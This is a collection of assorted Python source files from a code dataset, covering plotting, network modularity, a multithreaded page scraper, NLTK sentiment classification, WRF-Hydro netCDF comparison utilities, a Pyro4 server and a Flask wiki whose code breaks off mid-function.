+{"seq_id":"575515688","text":"import matplotlib.pyplot as plt\nimport math\nimport numpy\n\nf = open(\"../random-result.txt\")\n\nrandom = []\nfor line in f:\n random.append(list(line.strip('\\n').split(' ')))\n\nx = []\ny = []\n\nfor i in range(100):\n x.append(eval(random[i][0]))\n y.append(eval(random[i][1]))\n\nabcd = []\n\nfor i in range(3):\n abcd.append(eval(random[100][i]))\n\n#plt.scatter(x,y)\n#plt.show()\n\nx_e = numpy.linspace(0,1,1000)\ny_e = [math.exp(abcd[0]*(i**2)+abcd[1]*(i**1)+abcd[2]) for i in x_e]\n\nx_r = numpy.linspace(0,1,1000)\ny_r = [math.exp(1*(i**2)+2*(i**1)+1) for i in x_r ]\n\nplt.plot(x_e,y_e)\nplt.plot(x_r,y_r)\nplt.show()","sub_path":"ch6/ceres_curve_fitting/test_result/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"51243140","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 5 13:58:43 2017\r\n\r\n@author: Administrator\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport networkx as nx\r\nfrom mvv_karate import karate_network,karate_community_dict\r\n#print (dolphin_network.degree(0))\r\nG = karate_network\r\nG_adjacency = {}\r\nfor i in G.nodes():\r\n G_adjacency[i] = G.neighbors(i)\r\n#print (G_adjacency)\r\nG_adjacency_dict = {}\r\nfor i in G_adjacency:\r\n for j in G_adjacency[i]:\r\n G_adjacency_dict[(i,j)] = 1\r\n#print (G_adjacency_dict)\r\n#\r\n# \r\nG_adjacency_matrix = []\r\nfor i in range(len(G.nodes())):\r\n a = []\r\n for j in range(len(G.nodes())):\r\n if (sorted(G.nodes())[i],sorted(G.nodes())[j]) in G_adjacency_dict:\r\n a.append(1)\r\n else:\r\n a.append(0)\r\n G_adjacency_matrix.append(a)\r\nG_adjacency_matrix = np.mat(G_adjacency_matrix)\r\n#print (G_adjacency_matrix)\r\n#\r\n####\r\n#\r\n####\r\n#community_dict = {'1':2,'3':1,'2':2,}\r\n#cmmatrix = [] \r\n#n = 2\r\n#for i in community_dict:\r\n# data = [0 for i in np.arange(n)]\r\n# #print (data)\r\n# if community_dict[i] == 1:\r\n# data[0] =1\r\n# cmmatrix.append(data)\r\n# if community_dict[i] == 2:\r\n# data[1] =1\r\n# cmmatrix.append(data)\r\n#print (cmmatrix)\r\n#community_dict = {'1':2,'3':1,'2':2,}\r\ncmmatrix = [] \r\nn = 2\r\nfor i in karate_community_dict:\r\n data = [0 for i in np.arange(n)]\r\n #print (data)\r\n if karate_community_dict[i] == 0:\r\n data[0] =1\r\n cmmatrix.append(data)\r\n if karate_community_dict[i] == 1:\r\n data[1] =1\r\n cmmatrix.append(data)\r\n# if karate_community_dict[i] == 2:\r\n# data[2] =1\r\n# cmmatrix.append(data)\r\n# if karate_community_dict[i] == 3:\r\n# data[3] =1\r\n# cmmatrix.append(data)\r\n# if karate_community_dict[i] == 4:\r\n# data[4] =1\r\n# cmmatrix.append(data)\r\n#print (cmmatrix)\r\n#print (sum(G_adjacency_matrix))\r\nB = np.zeros((len(G_adjacency_matrix),len(G_adjacency_matrix)))\r\n#print (B)\r\nfor i in range(len(G_adjacency_matrix)):\r\n for j in range(len(G_adjacency_matrix)):\r\n list1 = sorted(G.nodes())\r\n C = karate_network.degree(list1[i])*karate_network.degree(list1[j])\r\n #print(C)\r\n C = C/(2*(len(karate_network.edges())))\r\n #print (C)\r\n B[i,j] = G_adjacency_matrix[i,j] - C\r\nS = np.mat(cmmatrix).T * B * np.mat(cmmatrix)\r\nQ = np.trace(S)/(2*(len(karate_network.edges())))\r\nprint (Q)","sub_path":"code/modularity_karate.py","file_name":"modularity_karate.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"210610540","text":"import threading  # threads\nfrom queue import Queue  # queues\nfrom lxml import etree  # parsing\nimport requests  # requests\nimport json  # storage\n\n# crawl-loop exit flag (must start False so the crawl threads actually run)\nCRAWL_EXIT = False\n# parse-loop exit flag\nPARSE_EXIT = False\n\nclass ThreadParse(threading.Thread):\n def __init__(self,threadName,dataQueue,fileName):\n super(ThreadParse,self).__init__()\n self.threadName = threadName\n self.dataQueue = dataQueue\n self.fileName = fileName\n\n def run(self):\n print('Starting '+self.threadName+'-->')\n while not PARSE_EXIT:\n try:\n html = self.dataQueue.get(False)\n self.parse(html)\n except:\n print('dataQueue is Empty!!!')\n print('<--'+self.threadName+' finished')\n\n def parse(self,html):\n theHtml = etree.HTML(html)\n nodeList = theHtml.xpath('//div[@class=\"article block untagged\"]')\n for node in nodeList:\n userName = node.xpath('div[@class=\"author\"]/a[2]/h2/text()')\n userUrl = node.xpath('div[@class=\"author\"]/a[1]/@href')\n nodeText = node.xpath('a[@class=\"contentHerf\"]/div/span/text()')\n textUrl = node.xpath('a[@class=\"contentHerf\"]/@href')\n rating = node.xpath('div[@class=\"stats\"]/span[@class=\"stats-vote\"]/i/text()')\n item = {  # package the data\n 'userName':userName,\n 'userUrl':userUrl,\n 'nodeText':nodeText,\n 'textUrl':textUrl,\n 'rating':rating\n }\n json_data = json.dumps(item,ensure_ascii=False)  # serialize to a JSON string\n # fileName is an already-open binary file handle shared by the parse threads\n self.fileName.write((json_data + '\\n').encode('utf-8'))\n\nclass ThreadCrawl(threading.Thread):\n def __init__(self,threadName,pageQueue,dataQueue):\n #threading.Thread.__init__(self)\n super(ThreadCrawl,self).__init__()\n self.threadName = threadName\n self.pageQueue = pageQueue\n self.dataQueue = dataQueue\n self.headers = {\n 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'\n }\n\n def run(self):\n print('Starting '+self.threadName+'-->')\n while not CRAWL_EXIT:\n try:\n # the optional \"block\" argument defaults to True: with block=True an empty queue blocks,\n # with block=False an empty queue raises a Queue.Empty exception instead\n page = self.pageQueue.get()  # take one page number, first in first out\n url = 'https://www.qiushibaike.com/8hr/page/'+str(page)+'/'\n content = requests.get(url,headers = self.headers)\n self.dataQueue.put(content.text)  # queue the page's HTML source\n except:\n print('block=False raised an empty-queue ERROR!!!')\n print('<--'+self.threadName+' finished')\n\ndef main():\n pageQueue = Queue(10)  # unbounded if maxsize is omitted\n for i in range(1,11):\n pageQueue.put(i)\n # queue of crawl results (the HTML source of each page)\n dataQueue = Queue()\n\n fileName = open('duanzi.json','wb')\n\n crawlList = ['get01','get02','get03']  # three crawl thread names\n threadCrawl = []  # holds the crawl threads\n for threadName in crawlList:\n thread = ThreadCrawl(threadName,pageQueue,dataQueue)\n thread.start()\n threadCrawl.append(thread)\n\n parseList = ['parse01','parse02','parse03']\n threadParse = []\n for threadName in parseList:\n thread = ThreadParse(threadName,dataQueue,fileName)\n thread.start()\n threadParse.append(thread)\n\n # wait until every page has been taken, then let the crawl threads exit their loops\n while not pageQueue.empty():\n pass\n\n global CRAWL_EXIT\n CRAWL_EXIT = True\n print('The PageQueue is Empty!!!')\n\n for thread in threadCrawl:\n thread.join()\n print('-0-')\n\n # wait until the parse threads have drained the data queue, then stop them too\n while not dataQueue.empty():\n pass\n\n global PARSE_EXIT\n PARSE_EXIT = True\n\n for thread in threadParse:\n thread.join()\n print('-1-')\n\nif __name__ == '__main__':\n # original author's note: unfinished due to technical reasons, to be completed later\n main()","sub_path":"02/MoreThreadSpider/PowerSpider.py","file_name":"PowerSpider.py","file_ext":"py","file_size_in_byte":4005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"45389393","text":"from sys import stdin\n\nSUITS = ('Clubs', 'Spades', 'Diamonds', 'Hearts')\nRANKS = ('2', '3', '4', '5', '6', '7', '8', '9', '10',\n 'Jack', 'Queen', 'King', 'Ace')\nOUTPUT = '{}-of-{}'.format\n\n\ndef rank_of_suit(card_num):\n suit_value, rank_value = divmod(card_num, 13)\n return OUTPUT(RANKS[rank_value], SUITS[suit_value])\n\nnext(stdin)\nprint(' '.join(map(rank_of_suit, map(int, 
next(stdin).split()))))\n","sub_path":"p58.py","file_name":"p58.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"31755854","text":"import deepdiff\nimport f90nml\nimport io\nimport os\nimport pandas as pd\nimport pathlib\nimport subprocess\nimport warnings\nimport xarray as xr\nfrom .job_tools import touch\nimport pathlib\nimport numpy as np\n\ndef compare_nc_nccmp(candidate_nc: str,\n reference_nc: str,\n nccmp_options: list = ['--data','--metadata','--force','--quiet'],\n exclude_vars: list = None):\n\n \"\"\"Compare two netcdf files using nccmp\n Args:\n candidate_restart: The path for the candidate restart file\n ref_restarts: The path for the reference restart file\n nccmp_options: List of long-form command line options passed to nccmp,\n see http://nccmp.sourceforge.net/ for options\n exclude_vars: A list of strings containing variables names to\n exclude from the comparison\n Returns:\n Either a pandas dataframe if possible or subprocess object\n \"\"\"\n #Try and set files to strings\n candidate_nc = str(candidate_nc)\n reference_nc = str(reference_nc)\n\n # Make list to pass to subprocess\n command_list=['nccmp']\n\n for item in nccmp_options:\n command_list.append(item)\n\n command_list.append('-S')\n\n if exclude_vars is not None:\n # Convert exclude_vars list into a comman separated string\n exclude_vars = ','.join(exclude_vars)\n #append\n command_list.append('-x ' + exclude_vars)\n\n command_list.append(candidate_nc)\n command_list.append(reference_nc)\n\n #Run the subprocess to call nccmp\n proc = subprocess.run(command_list,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n #Check return code\n if proc.returncode != 0:\n # Get stoud into stringio object\n output = io.StringIO()\n output.write(proc.stdout.decode('utf-8'))\n output.seek(0)\n\n # Open stringio object as pandas dataframe\n try:\n nccmp_out = pd.read_table(output,delim_whitespace=True,header=0)\n return nccmp_out\n except:\n warnings.warn('Probleming reading nccmp output to pandas dataframe,'\n 'returning as subprocess object')\n return proc\n\n\ndef compare_ncfiles(candidate_files: list,\n reference_files: list,\n nccmp_options: list = ['--data', '--metadata', '--force', '--quiet'],\n exclude_vars: list = ['ACMELT','ACSNOW','SFCRUNOFF','UDRUNOFF','ACCPRCP',\n 'ACCECAN','ACCEDIR','ACCETRAN','qstrmvolrt']):\n \"\"\"Compare lists of netcdf restart files element-wise. 
Files must have common names\n    Args:\n        candidate_files: List of candidate restart file paths\n        reference_files: List of reference restart file paths\n        nccmp_options: List of long-form command line options passed to nccmp,\n        see http://nccmp.sourceforge.net/ for options\n        exclude_vars: A list of strings containing variable names to\n        exclude from the comparison\n    Returns:\n        A named list of either pandas dataframes if possible or subprocess objects\n    \"\"\"\n\n    ref_dir = reference_files[0].parent\n    output_list = []\n    for file_candidate in candidate_files:\n        file_reference = ref_dir.joinpath(file_candidate.name)\n        if file_reference.is_file():\n            nccmp_out = compare_nc_nccmp(candidate_nc=file_candidate,\n                                         reference_nc=file_reference,\n                                         nccmp_options=nccmp_options,\n                                         exclude_vars=exclude_vars)\n            output_list.append(nccmp_out)\n        else:\n            warnings.warn(str(file_candidate) + ' not found in ' + str(ref_dir))\n    return output_list\n\n###Retaining for backwards compatibility until deprecated\ncompare_restarts = compare_ncfiles\n\ndef diff_namelist(namelist1: str, namelist2: str, **kwargs) -> dict:\n    \"\"\"Diff two fortran namelist files and return a dictionary of differences.\n\n    Args:\n        namelist1: String containing path to the first namelist file.\n        namelist2: String containing path to the second namelist file.\n        **kwargs: Additional arguments passed onto deepdiff.DeepDiff method\n    Returns:\n        The differences between the two namelists\n    \"\"\"\n\n    # Read namelists into dicts\n    namelist1 = f90nml.read(namelist1)\n    namelist2 = f90nml.read(namelist2)\n    # Diff the namelists\n    differences = deepdiff.DeepDiff(namelist1, namelist2, ignore_order=True, **kwargs)\n    differences_dict = dict(differences)\n    return (differences_dict)\n\n\ndef open_nwmdataset(paths: list,\n                    chunks: dict=None,\n                    forecast: bool = True) -> xr.Dataset:\n    \"\"\"Open a multi-file wrf-hydro output dataset\n\n    Args:\n        paths: List, iterable, or generator of file paths to wrf-hydro netcdf output files\n        chunks: chunks argument passed on to xarray Dataset.chunk() method\n        forecast: If forecast, the reference_time dimension is retained, if not then\n        reference_time dimension is set to a dummy value (1970-01-01) to ease concatenation\n        and analysis\n    Returns:\n        An xarray dataset of dask arrays chunked by chunk_size along the feature_id\n        dimension concatenated along the time and\n        reference_time dimensions\n    \"\"\"\n\n    # Create dictionary of forecasts, i.e. 
reference times\n    ds_dict = dict()\n    for a_file in paths:\n        ds = xr.open_dataset(a_file,chunks=chunks)\n        # Check if forecast and set reference_time to zero if not\n        if not forecast:\n            ds.coords['reference_time'].values = np.array(\n                [np.datetime64('1970-01-01T00:00:00', 'ns')])\n\n        ref_time = ds['reference_time'].values[0]\n        if ref_time in ds_dict:\n            # append the new number to the existing array at this slot\n            ds_dict[ref_time].append(ds)\n        else:\n            # create a new array in this slot\n            ds_dict[ref_time] = [ds]\n\n    # Concatenate along time axis for each forecast\n    forecast_list = list()\n    for key in ds_dict.keys():\n        forecast_list.append(xr.concat(ds_dict[key],\n                                       dim='time',\n                                       coords='minimal'))\n\n    # Concatenate along reference_time axis for all forecasts\n    nwm_dataset = xr.concat(forecast_list,\n                            dim='reference_time',\n                            coords='minimal')\n\n    # Break into chunked dask array\n    if chunks is not None:\n        nwm_dataset = nwm_dataset.chunk(chunks=chunks)\n\n    return nwm_dataset\n\n\ndef __make_relative__(run_object, basepath=None):\n    \"\"\"Make all file paths relative to a given directory, useful for opening file\n    attributes in a run object after it has been moved or copied to a new directory or\n    system.\n    Args:\n        basepath: The base path to use for relative paths. Defaults to run directory.\n        This rarely needs to be defined.\n    Returns:\n        self with relative files paths for file-like attributes\n    \"\"\"\n    import wrfhydropy\n    if basepath is None:\n        basepath = run_object.simulation_dir\n    for attr in dir(run_object):\n        if attr.startswith('__') is False:\n            attr_object = getattr(run_object, attr)\n            if type(attr_object) == list:\n                relative_list = list()\n                for item in attr_object:\n                    if type(item) is pathlib.PosixPath or type(\n                            item) is wrfhydropy.WrfHydroStatic:\n                        relative_list.append(item.relative_to(basepath))\n                setattr(run_object, attr, relative_list)\n            if type(attr_object) is wrfhydropy.WrfHydroTs:\n                relative_list = list()\n                for item in attr_object:\n                    if type(item) is pathlib.PosixPath or type(\n                            item) is wrfhydropy.WrfHydroStatic:\n                        relative_list.append(item.relative_to(basepath))\n                relative_list = wrfhydropy.WrfHydroTs(relative_list)\n                setattr(run_object, attr, relative_list)\n\n            elif type(attr_object) is pathlib.PosixPath:\n                setattr(run_object, attr, attr_object.relative_to(basepath))\n\n        if attr == 'simulation':\n            __make_relative__(run_object.simulation.domain,\n                              basepath=run_object.simulation.domain.domain_top_dir)\n\n\ndef get_pickle_lock_file(run_obj):\n    return run_obj.run_dir / 'pickle_locked'\n\n\ndef lock_pickle(run_obj):\n    if is_pickle_locked(run_obj):\n        raise ValueError('The pickle file, ' + str(run_obj.run_dir) + ', is already locked')\n    pickle_lock_file = get_pickle_lock_file(run_obj)\n    touch(pickle_lock_file)\n    run_obj._pickle_lock_file = pickle_lock_file\n\n\ndef unlock_pickle(run_obj):\n    if not is_pickle_locked(run_obj):\n        raise ValueError('The pickle file, ' + str(run_obj.run_dir) + ', is already unlocked')\n    pickle_lock_file = get_pickle_lock_file(run_obj)\n    os.remove(pickle_lock_file)\n    run_obj._pickle_lock_file = None\n\n\ndef is_pickle_locked(run_obj):\n    internal_lock = run_obj._pickle_lock_file is not None\n    pickle_lock_file = get_pickle_lock_file(run_obj)\n    external_lock = pickle_lock_file.exists()\n    total_lock = internal_lock + external_lock\n    if total_lock == 1:\n        raise ValueError('The internal_lock must match external_lock.')\n    return bool(total_lock)\n\n\ndef get_git_revision_hash(the_dir):\n\n    # First test if this is even a git repo. 
(Have to allow for this unless the wrfhydropy\n    # testing brings in the wrf_hydro_code as a repo with a .git file.)\n    dir_is_repo = subprocess.call(\n        [\"git\", \"branch\"],\n        stderr=subprocess.STDOUT,\n        stdout=open(os.devnull, 'w'),\n        cwd=the_dir\n    )\n    if dir_is_repo != 0:\n        warnings.warn('The source directory is NOT a git repo: ' + str(the_dir))\n        return 'not-a-repo'\n\n    dirty = subprocess.run(\n        ['git', 'diff-index', 'HEAD'],  # --quiet seems to give the wrong result.\n        stdout=subprocess.PIPE,\n        stderr=subprocess.PIPE,\n        cwd=the_dir\n    ).returncode\n    the_hash = subprocess.check_output(['git', 'rev-parse', 'HEAD'], cwd=the_dir)\n    the_hash = the_hash.decode('utf-8').split()[0]\n    if dirty:\n        the_hash += '--DIRTY--'\n    return the_hash\n","sub_path":"wrfhydropy/core/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":10408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"522006673","text":"import Pyro4\n\n\n@Pyro4.expose\nclass GreetingMaker(object):\n    def get_fortune(self, name):\n        return \"Hello, {0}\".format(name)\n\n\ndaemon = Pyro4.Daemon()\nns = Pyro4.locateNS()\n\nuri = daemon.register(GreetingMaker)\nns.register(\"pavillion.greeting\", uri)\n\n\nprint(\"Ready.\")\ndaemon.requestLoop()\n","sub_path":"python/pyro_server.py","file_name":"pyro_server.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"364507125","text":"from random import randint\nprint('=-='*10)\nprint('LET US PLAY EVEN OR ODD')\nprint('=-='*10)\nv = 0\nwhile True:\n    jogador = int(input('Enter a value: '))\n    computador = randint(0, 10)\n    total = jogador + computador\n    tipo = ' '\n    while tipo not in 'PI':\n        # P = even (par), I = odd (impar)\n        tipo = str(input('Even or Odd? [P/I] ')).upper().strip()[0]\n    print(f'You played {jogador} and the computer {computador}. Total of {total} ', end='')\n    print('It came out EVEN' if total % 2 == 0 else 'It came out ODD')\n    if tipo == 'P':\n        if total % 2 == 0:\n            print('You WON!!!!')\n            v += 1\n        else:\n            print('You LOST!!!')\n            break\n    elif tipo == 'I':\n        if total % 2 == 1:\n            print('You WON!!!')\n            v += 1\n        else:\n            print('You LOST!!!')\n            break\n    print('Let us play again...')\nprint(f'Game OVER!!! 
You won {v} times.')\n\n","sub_path":"EX./ex068.py","file_name":"ex068.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"456772169","text":"from nltk.classify import NaiveBayesClassifier\nimport pickle\nimport os.path as osp\n\n# SOURCE LINK\n# https://streamhacker.com/2010/05/10/text-classification-sentiment-analysis-naive-bayes-classifier/\nfrom nltk.corpus import movie_reviews\n\n\ndef word_feats(words):\n    return dict([(word, True) for word in words])\n\ndef init_classifier():\n    if osp.exists(\"classifier.pickle\"):\n        return (load_classifier())\n    negids = movie_reviews.fileids('neg')\n    posids = movie_reviews.fileids('pos')\n\n    negfeats = [(word_feats(movie_reviews.words(fileids=[f])), 'neg') for f in negids]\n    posfeats = [(word_feats(movie_reviews.words(fileids=[f])), 'pos') for f in posids]\n\n    trainfeats = negfeats + posfeats\n    classifier = NaiveBayesClassifier.train(trainfeats)# train once, then persist and return the same model\n    save_classifier(classifier)\n    return classifier\n\n\n\ndef classify_corpus(corpus = ''):\n    classifier = init_classifier()\n\n    probabilty_distance = classifier.prob_classify(word_feats(corpus))\n\n    pos_result = round(probabilty_distance.prob(\"pos\"), 2)\n    neg_result = 1 - pos_result\n    return({'pos' : pos_result, 'neg' : neg_result})\n\ndef classify_corpus_list(list = []):\n    sum_pos = 0\n    sum_neg = 0\n    for corpus in list:\n        res = classify_corpus(corpus)\n        sum_pos += res['pos']\n        sum_neg += res['neg']\n    sum = sum_pos + sum_neg\n    pos = sum_pos / sum\n    neg = sum_neg / sum\n    return({'pos' : pos, 'neg' : neg})\n\ndef save_classifier(classifier):\n    f = open('classifier.pickle', 'wb')\n    pickle.dump(classifier, f)\n    f.close()\n\ndef load_classifier():\n    f = open('classifier.pickle', 'rb')\n    classifier = pickle.load(f)\n    f.close()\n    return classifier","sub_path":"SentimentalService/sentimental.py","file_name":"sentimental.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"334140051","text":"from scale_client.sensors.virtual_sensor import VirtualSensor\n#import RPi.GPIO as GPIO\n\nclass GPIOVirtualSensor(VirtualSensor):\n\tdef __init__(self, queue, device, gpio_pin):\n\t\tVirtualSensor.__init__(self, queue, device)\n\t\tself._pin = gpio_pin\n\t\tself._GPIO = None\n\n\tdef connect(self):\n\t\t# use P1 GPIO pin numbering convention\n\t\tif self._GPIO is None:\n\t\t\timport RPi.GPIO as GPIO\n\n\t\t\tself._GPIO = GPIO\n\n\t\t# reference the module via self._GPIO so repeated connect() calls work\n\t\tself._GPIO.setmode(self._GPIO.BCM)\n\t\t# set up GPIO channel\n\t\tself._GPIO.setup(self._pin, self._GPIO.IN)\n\t\treturn True\n","sub_path":"scale_client/sensors/gpio_virtual_sensor.py","file_name":"gpio_virtual_sensor.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"261544948","text":"# Read data from the txt\ncontent=[]\nf= open(\"0.01_0.8_1k.txt\",'r')\nfor line in f:\n    content.append(line.split())\nlist_of_p= []\nlist_of_q = []\nlist_of_z=[]\nlist_of_end=[]\nlist_of_it=[]\nfor p in range(100):\n    list_of_p.append(p*0.01)\n    list_of_q.append(p*0.01)\n\nfor item in content:\n    list_of_end.append(float(item[3]))\n    list_of_it.append(float(item[4]))\nnew_it = []\nnew_end =[]\nfor index in range(99):\n    new_it.append(list_of_it[99*index:99+index*99])\n    new_end.append(list_of_end[99*index:99+index*99])\n\nimport plotly.graph_objects as go\nfig = go.Figure(go.Surface(\n    contours = {\n        \"x\": {\"show\": True, \"start\": 1.5, 
\"end\": 2, \"size\": 0.04, \"color\":\"white\"},\n \"z\": {\"show\": True, \"start\": 0.5, \"end\": 0.8, \"size\": 0.05}\n },\n x = list_of_p,\n y = list_of_q,\n z = new_end))\nfig.update_layout(\n scene = {\n 'camera_eye': {\"x\": 0, \"y\": -1, \"z\": 0.5},\n \"aspectratio\": {\"x\": 1, \"y\": 1, \"z\": 0.2}\n })\nfig.show()\nfig = go.Figure(go.Surface(\n contours = {\n \"x\": {\"show\": True, \"start\": 1.5, \"end\": 2, \"size\": 0.04, \"color\":\"white\"},\n \"z\": {\"show\": True, \"start\": 0.5, \"end\": 0.8, \"size\": 0.05}\n },\n x = list_of_p,\n y = list_of_q,\n z = new_it))\nfig.update_layout(\n scene = {\n 'camera_eye': {\"x\": 0, \"y\": -1, \"z\": 0.5},\n \"aspectratio\": {\"x\": 1, \"y\": 1, \"z\": 0.2}\n })\nfig.show()\n","sub_path":"high_res_graphs.py","file_name":"high_res_graphs.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"208669311","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nNapkin wiki.\n\"\"\"\n\nimport datetime\n\nimport flask\nimport json\n\nimport markdown\n\nfrom napkin.pages import utils as index_utils\nfrom napkin.db import api as db_api\n\n\nURL_PREFIX_WIKI_WEB = '/wiki'\n\n\ndef app_load_web_wiki(app, opts=None):\n\n\n def wiki_util_page_check_lock(pg):\n if not pg:\n return False\n\n if pg.state != 'lock':\n return False\n\n locked_at = pg.locked_at\n if not locked_at:\n return False\n\n time_now = datetime.datetime.now()\n tm_delta = time_now - locked_at\n d_sec = tm_delta.total_seconds()\n #if d_sec > 60 * 60: # 1 hour\n if d_sec > 60 * 10: # 10 minutes\n return False\n else:\n return True\n\n\n # Wiki Help Page\n @app.route(URL_PREFIX_WIKI_WEB + '/help/')\n ##@index_utils.login_required\n def wiki_help():\n txt = index_utils.file_read_local_md('napkin/templates/wiki/example.md')\n\n txthtml = wk_markdown_to_html(txt)\n #return flask.Response(nodes.to_json(),\n # mimetype='application/json')\n return flask.render_template('wiki/help.html', txthtml=txthtml)\n\n\n # Wiki Result Page\n @app.route(URL_PREFIX_WIKI_WEB + '/result/', methods=['GET', 'POST'])\n ##@index_utils.login_required\n def wiki_result():\n if flask.request.method == 'GET':\n args = index_utils.flask_req_get_querystr(flask.request)\n else:\n args = index_utils.flask_req_get_post_data(flask.request)\n\n result_txt = args.get('result', '')\n\n return flask.render_template('wiki/result.html', result_txt=result_txt)\n\n\n # Wiki List Page\n @app.route(URL_PREFIX_WIKI_WEB + '/list/')\n ##@index_utils.login_required\n def wiki_list_all():\n #pgs = db_api.wiki_page_get_all()\n #pgs = db_api.wiki_page_filter(level=1)\n pgs = db_api.wiki_page_filter(level=0).order_by('-created_at')\n return flask.render_template('wiki/list.html', pgs=pgs)\n\n # Wiki Index Page\n @app.route(URL_PREFIX_WIKI_WEB + '/')\n ##@index_utils.login_required\n def wiki_index():\n #pgs = db_api.wiki_page_get_all()\n pgs = db_api.wiki_page_filter(level=1).order_by('created_at')\n return 
flask.render_template('wiki/index.html', pgs=pgs)\n\n\n    # Wiki Single Page\n    @app.route(URL_PREFIX_WIKI_WEB + '/page/<pgid>')\n    ##@index_utils.login_required\n    def wiki_page(pgid=None):\n        if not pgid:\n            return flask.redirect(flask.url_for('wiki_index'))\n\n        try:\n            pg = db_api.wiki_page_get(pgid)\n        except:\n            return flask.redirect(flask.url_for('wiki_index'))\n        content = pg.content # TODO(likun):\n        txthtml = wk_markdown_to_html(content)\n        title = pg.title\n        updated_at = pg.updated_at\n        state = pg.state\n\n        locked = wiki_util_page_check_lock(pg)\n        return flask.render_template('wiki/page.html', title=title,\n                                     txthtml=txthtml, pgid=pgid,\n                                     updated_at=updated_at, state=state,\n                                     locked=locked)\n\n\n    # Wiki Post Page\n    @app.route(URL_PREFIX_WIKI_WEB + '/post/')\n    ##@index_utils.login_required\n    def wiki_post():\n        return flask.render_template('wiki/post.html')\n\n\n    # Wiki Edit Page\n    @app.route(URL_PREFIX_WIKI_WEB + '/edit/<pgid>')\n    ##@index_utils.login_required\n    def wiki_edit(pgid=None):\n        if not pgid:\n            return flask.redirect(flask.url_for('wiki_index'))\n\n        try:\n            pg = db_api.wiki_page_get(pgid)\n        except:\n            return flask.redirect(flask.url_for('wiki_index'))\n\n        pgid = str(pg.id)\n\n        locked = wiki_util_page_check_lock(pg)\n        if locked:\n            return flask.redirect('/wiki/page/' + pgid)\n\n        content = pg.content # TODO(likun):\n        title = pg.title\n        keywords = pg.keywords\n        #if keywords:\n        #    keywords = ' '.join(keywords)\n        #else:\n        #    keywords = ''\n        if isinstance(keywords, (list, tuple, set)):\n            keywords = ' '.join(keywords)\n        level = pg.level\n        updated_at = pg.updated_at\n\n        # lock the page\n        pg.state = 'lock'\n        pg.locked_at = datetime.datetime.now()\n        pg.save()\n\n        return flask.render_template('wiki/edit.html', pgid=pgid,\n                                     content=content, title=title,\n                                     keywords=keywords, level=level,\n                                     updated_at=updated_at)\n\n\n    # Wiki Post API\n    @app.route(URL_PREFIX_WIKI_WEB + '/api/post', methods=['POST'])\n    ##@index_utils.login_required\n    def wiki_api_post():\n        if flask.request.method == 'GET':\n            args = index_utils.flask_req_get_querystr(flask.request)\n        else:\n            args = index_utils.flask_req_get_post_data(flask.request)\n\n        pgid = args.get('pageid')\n\n        page_title = args.get('page_title', '')\n        page_content = args.get('page_content', '')\n        page_keywords = args.get('page_keywords', '') # []\n        page_level = args.get('page_level', 0)\n\n        #if isinstance(page_keywords, (str, unicode)):\n        #    page_keywords = index_utils.str_to_list_by(page_keywords)\n\n        try:\n\n            if pgid: # edit\n                pg = db_api.wiki_page_get(pgid)\n\n                # TODO(likun):\n                #locked = wiki_util_page_check_lock(pg)\n                #if locked:\n                #    return flask.redirect('/wiki/page/' + pgid)\n\n                #pg.version += 1\n\n                #pg.title = page_title\n                #pg.content = page_content\n                #pg.keywords = page_keywords\n\n                pg_d = {}\n                pg_d['version'] = pg.version + 1\n                pg_d['title'] = page_title\n                pg_d['content'] = page_content\n                pg_d['keywords'] = page_keywords\n                pg_d['level'] = page_level\n                pg_d['updated_at'] = datetime.datetime.now()\n                pg_d['state'] = 'open'\n                #pg_d['locked_at'] = datetime.datetime.now()\n\n                db_api.wiki_page_update(pgid, pg_d)\n            else:\n                pg_d = {}\n                pg_d['title'] = page_title\n                pg_d['content'] = page_content\n                pg_d['keywords'] = page_keywords\n                pg_d['level'] = page_level\n                pg_d['state'] = 'open'\n                #pg_d['locked_at'] = datetime.datetime.now()\n\n                username = flask.session.get('username', 'author_name')\n                pg_d['author_name'] = username # TODO:\n                \n                pg_o = db_api.wiki_page_create(pg_d)\n\n                pgid = str(pg_o.id)\n\n            #return flask.Response(json.dumps(pg_d),\n            #                      mimetype='application/json')\n            #return 
